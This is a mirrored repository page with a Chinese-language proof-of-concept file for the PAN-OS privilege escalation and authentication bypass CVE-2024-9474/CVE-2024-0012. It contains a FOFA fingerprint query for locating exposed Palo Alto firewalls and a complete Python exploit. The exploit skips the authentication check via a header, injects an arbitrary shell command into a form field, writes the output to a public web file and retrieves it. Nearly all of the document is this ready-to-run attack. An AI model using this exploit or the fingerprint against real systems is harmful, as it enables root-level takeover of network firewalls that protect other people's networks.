admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 18:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/PAN-OS/CVE-2024-9474.md

118 lines
3.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# PAN-OS软件中存在权限提升漏洞(CVE-2024-9474/CVE-2024-0012)
Palo Alto Networks PAN-OS 软件中存在权限提升漏洞,允许有权访问管理 Web 界面的 PAN-OS 管理员以 root 权限在防火墙上执行操作。 Cloud NGFW 和 Prisma Access 不受此漏洞影响。
## fofa
```javascript
icon_hash="873381299"
```
## poc
```python
import requests
import argparse
import urllib3
import base64
# Set up command-line argument parsing
parser = argparse.ArgumentParser(description="Send a POST request with a specified hostname.")
parser.add_argument("hostname", help="The hostname to be used in the request.")
parser.add_argument("command", help="Command to execute")
args = parser.parse_args()
# Assign the hostname variable
hostname = args.hostname
#lhost = args.lip
#lport = args.lport
command = args.command
# Define the proxy configuration
proxies = {
"http": "http://localhost:8080",
"https": "http://localhost:8080",
}
proxies = "" # comment line to go through the Burp Proxy
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Define the URL and headers
url = f"https://{hostname}/php/utils/createRemoteAppwebSession.php/watchTowr.js.map"
header1 = {
"Host": hostname,
"X-PAN-AUTHCHECK": "off",
"Content-Type": "application/x-www-form-urlencoded",
}
# Define the payload
payload_new = (
"user=`"+str(command)+"`"
"&userRole=superuser&remoteHost=&vsys=vsys1"
)
payload_orig = (
"user=`echo $("+str(command)+") > /var/appweb/htdocs/unauth/watchTowr.php`"
"&userRole=superuser&remoteHost=&vsys=vsys1"
)
print("POST : " + url)
try:
#print(payload)
response = requests.post(url, headers=header1, data=payload_orig, proxies=proxies, verify=False)
print("Status Code:", response.status_code)
if 'Set-Cookie' in response.headers and response.status_code == 200 :
set_cookie = response.headers['Set-Cookie']
# Look for the PHPSESSID in the Set-Cookie header
if 'PHPSESSID=' in set_cookie:
# Extract the PHPSESSID value
phpsessid = set_cookie.split('PHPSESSID=')[1].split(';')[0]
print(f"PHPSESSID: {phpsessid}")
else:
print("PHPSESSID not found in Set-Cookie header")
else:
print("'Set-Cookie' header not found in response headers")
print()
except requests.RequestException as e:
print("An error occurred:", e)
header2 = {
"Host": hostname,
"Cookie": f"PHPSESSID={phpsessid};",
"X-PAN-AUTHCHECK": "off",
"Connection": "keep-alive"
}
url2 = f"https://{hostname}/index.php/.js.map"
print("GET : " + url2)
try:
response2 = requests.get(url2, headers=header2, proxies=proxies, verify=False)
print("Status Code:", response2.status_code)
print()
except requests.RequestException as e:
print("An error occurred:", e)
url3 = f"https://{hostname}/unauth/watchTowr.php"
print("GET : " + url3)
try:
response3 = requests.get(url3, headers=header2, proxies=proxies, verify=False)
print("Status Code:", response3.status_code)
print("Status Content:", response3.content)
except requests.RequestException as e:
print("An error occurred:", e)
```
## 漏洞来源
- https://github.com/k4nfr3/CVE-2024-9474/blob/main/exploit_fw.py
- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/?123
Reference in New Issue Copy Permalink